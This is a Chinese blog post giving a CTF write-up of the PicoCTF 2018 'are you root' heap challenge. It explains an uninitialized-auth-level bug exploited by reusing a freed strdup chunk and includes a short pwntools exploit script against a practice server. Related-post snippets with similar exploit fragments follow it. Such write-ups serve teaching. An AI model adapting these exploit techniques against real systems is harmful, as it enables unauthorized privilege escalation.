PicoCTF_2018_are_you_root(未初始化验证漏洞)

最新推荐文章于 2023-05-30 20:13:23 发布
最新推荐文章于 2023-05-30 20:13:23 发布
阅读量842 收藏 1
点赞数 1
分类专栏: pwn 二进制漏洞 CTF 文章标签: 安全 PWN CTF 二进制漏洞 未初始化漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/seaaseesa/article/details/105588350
版权
pwn 同时被 3 个专栏收录
161 篇文章 24 订阅
订阅专栏
二进制漏洞
161 篇文章 9 订阅
订阅专栏
CTF
161 篇文章 9 订阅
订阅专栏

PicoCTF_2018_are_you_root

首先,检查一下程序的保护机制

然后,我们用IDA分析一下,只要符合条件就可以显示flag,但是按照正常的逻辑是不能的。

Login时,会malloc一个堆,大小为0x10,并且偏移8处就是auth的验证码。但是login时,并没有初始化*(v7+8)处的值,使得它的值是前面的操作影响。而strdup函数,内部会malloc一个与字符串长度一样的堆,并把字符串拷贝进去。

Reset的时候,释放的是strdup生成的堆。因此,如果strdup生成的堆为0x20,下一次login时第一个malloc就会取出这个堆,而便宜8处的值就是之前用户输入的name的偏移8处的值,因此auth验证码可以任意控制。

#coding:utf8
from pwn import *

#sh = process('./PicoCTF_2018_are_you_root')
sh = remote('node3.buuoj.cn',27478)

def login(name):
   sh.sendlineafter('>','login ' + name)

def reset():
   sh.sendlineafter('>','reset')

def getFlag():
   sh.sendlineafter('>','get-flag')

#存在一个未初始化漏洞,没有对level进行校验
login('a'*0x8 + p64(0x5))
reset()
login('haivk')
getFlag()

sh.interactive()

 

ha1vk
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
ubuntu之Unable to lock the administration directory(/var/lib/dpkg/), are you root?13 Permission denie
码莎拉蒂
07-22 9049
apt-get install subversion E: 无法打开锁文件 /var/lib/dpkg/lock - open (13 Permission denied) E: Unable to lock the administration directory (/var/lib/dpkg/), are you root? Permission denied 出现这个提示就说明你没
AMD 显卡 radeontop 分析
11-13
AMD 显卡 radeontop 分析:包括radeontop源码分析及执行流程
[BUUCTF-pwn]——picoctf_2018_are you root
Y_peak的博客
03-09 319
[BUUCTF-pwn]——picoctf_2018_are you root 题目地址:点这里 害,有点小烧脑子这道题. 又学习了几个没见过的C语言函数 peak小知识 strtok: 第一次使用时候,需要两个参数从第一个参数开始,到第二个参数接断并且返回. strdup: malloc一个参数字符串大小的内存,并且将字符串拷贝进去. 正文 下面进入正文,首先checksec看下 再去IDA中看下, 好明显的暗示 紧接着去看看代码, 想要进入give-flag函数, 需要v6 不为0, 同时
picoctf_2018_are you root
m0_51251108的博客
11-04 176
picoctf_2018_are you root: 参考博客: ha1vk 程序功能到达level5能打出flag,正常运行的话不会让你到达level5 login功能: strdup()在内部调用了malloc()为变量分配内存 返回一个指针,指向为复制字符串分配的空间 可以看到是申请了两个chunk,且我们的level参数就存在后面 直接说解法: 就是输name的我们填满8个a,然后就可以改到level参数 strdup会把name copy下去,包括level参数,我们free它的话,释放到tc
[buuctf]picoctf_2018_are you root初始化漏洞
weixin_46521144的博客
04-02 285
挺神奇的这道题,本地就是打不通,远程可以打通,绝了到底是为什么??? 本来以为这道题有一个指针置0的操作就没有UAF了,看来是我还见得太少,把UAF理解错了(其实我也没开始学堆哈哈哈哈) 参考了网上师傅的解答,发现这里是一个初始化漏洞。我画个栈帧大家就明白了 先写一下函数长什么样 栈帧长这样 注意到一开始v6是一个二级指针,也就是指向数组的数组 strtok分配的内容是存在*v6里面的,所以上述栈帧应该是对的 那么在用完free之后呢,这里的指针归零是指:不能再用该指针寻
在Ubuntu中遇到Unable to lock the administration directory (/var/lib/dpkg/),are you root? 问题解决办法
热门推荐
weizhiai12的专栏
04-03 1万+
在Ubuntu中遇到Unable to lock the administration directory (/var/lib/dpkg/),are you root? 问题解决办法 2015-12-02 19:14:09来源:CSDN作者:qq_27645299937人点击 在新装的Ubuntu虚拟系统中,安装docker,如果出现关于文件root问题,按照如下操作,尝试解决。(每行独立运行
heinie_V3.2.zip_ROOT_music 归一化_振动去噪
07-14
数据模型归一化,模态振动,采用了小波去噪的思想,包括 MUSIC算法,ESPRIT算法 ROOT-MUSIC算法。
root_music_1.rar_ROOT_root MUSIC
09-24
这里提到的"root_music_1.rar_ROOT_root MUSIC"标题暗示了我们正在讨论与安卓设备的root权限有关的内容,同时可能涉及到音乐播放或管理方面的应用。Rooting是安卓用户获取设备管理员权限的过程,这样可以访问和修改...
root.rar_ROOT_root MUSIC
07-14
求根MUSIC算法 非常有用 matlab 阵列信号处理 新手必学
nfs_root.rar_ROOT_nfs root_根文件
09-14
通过`nfs_root.rar`中的文件,你可以了解到如何构建一个适用于NFS的根文件系统,包括配置文件、初始化脚本、系统库等,这对于理解Linux系统的运行机制以及NFS工作原理非常有帮助。在进行系统移植或调试时,这个资源...
1.rar_ROOT_cosine_root raised cosine
07-14
Computer Simulation Results and Analysis for a Root Raised Cosine
picoctf_2018_echooo
doudoudedi
09-23 521
发现是简单的32位格式化字符串但是并且flag存了栈上,直接泄漏就行了,但是内存是小端存储的,所以倒序输出即可 exp: from pwn import * #p=process('./PicoCTF_2018_echooo') p=remote('node3.buuoj.cn',26798) offset=11 flag='' for i in range(27,27+11): payload='%{}$p'.format(str(i)) p.sendlineafter('> ',p
新手如何Reverces(基础ctf教程篇2:如何求解flag)
m0_49936845的博客
09-06 1171
如何求解fla 文章目录如何求解fla1,直接内存获取2.对算法进行逆变操作 1,直接内存获取 对于一些比较简单的题目,可以通过直接查看内存的方式获取flag。对于这种形式,只需要在比的地方下个断点,然后通过查看内存即刻得到flag。 参考例子: 远程动态调试 2.对算法进行逆变操作 如果一个判断过程的代码如下所示,那么要分析convert的算法,然后分析结果写出对应的逆算法,通过reverse_convert(stardard)方式求得flag ...
picoctf_2018_echooo(fmt)
m0_51251108的博客
11-19 338
picoctf_2018_echooo 这题还是蛮有意思的 程序分析: 它已经读取flag在栈上了,我们用格式字符串泄露出来flag就好 要写个脚本转换下,倒着组合一下 exp: from pwn import* #r=process('./PicoCTF_2018_echooo') r=remote('node4.buuoj.cn',29996) offest=11+(0x8c-0x4c)/4 print offest flag='' for i in range(11): payload='
buuoj Pwn writeup 231-235
yongbaoii的博客
08-31 329
231 pwnable_calc 232 picoctf_2018_authenticate 逻辑简单,就是一个格式化字符串漏洞,目的呢是把 bss段上的一个变量改一下。 偏移是11 exp from pwn import* context.log_level = "debug" r = remote("node4.buuoj.cn", "27718") bss = 0x804a04c payload = fmtstr_payload(11, {bss:1}) r.sendline(p
BUUCTF pwn rootersctf_2019_xsh
stareforever的博客
02-23 1962
查看保护,基本全开 IDA查看程序 程序读入命令,并通过子函数 run 执行 run函数 对读入的命令进行判断,只能执行ls, echo, zooo指令, 这里可以发现echo 命令存在format string 漏洞, 首先测试可以确定偏移为24 那么整体的思想就是修改程序提供的函数的got表为system@plt,然后再输入内容/bin/sh即可获得shell,目前可以利用的函数为strncmp和strtok函数 首先需要泄露piebase的值,这里介绍覆盖strncmp函数(strtok同理)
2023 CTF国赛初赛(CISCN) re- ez_byte
qq_54894802的博客
05-30 1444
我们跳到数据区,发现这个100%下面的,yes并没有在string窗口出现,我们按下x查询交叉引用,在执行yes之前,有个jmp指令,也就是说,按照程序执行是永远不好去到yes的地方的,也就是说,一定有什么操作,然后再跳到yes中去。在前面,我们分析了,对r12的操作,并没有直接出现在代码上,操作代码被隐藏了。为此,我们可以大致猜测就是运行程序,触发一个异常,然后通过此条转到想要操作的地方,进行操作,通过题目描述,应该就是嵌入了一堆字节码。我们查看判断跳入,yes的汇编,我们可以发现,
root用户已经是mysql_native_password身份验证插件
最新发布
06-08
如果你已经使用了root用户,并且身份验证插件已更改为mysql_native_password,则你可以尝试使用以下命令来授予root用户SYSTEM_USER权限: ``` GRANT SYSTEM_USER ON *.* TO 'root'@'localhost'; ``` 执行此命令后,你应该能够成功执行ALTER USER命令。如果你仍然无法执行该命令,请检查你的MySQL配置文件以确保已启用SYSTEM_USER权限。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值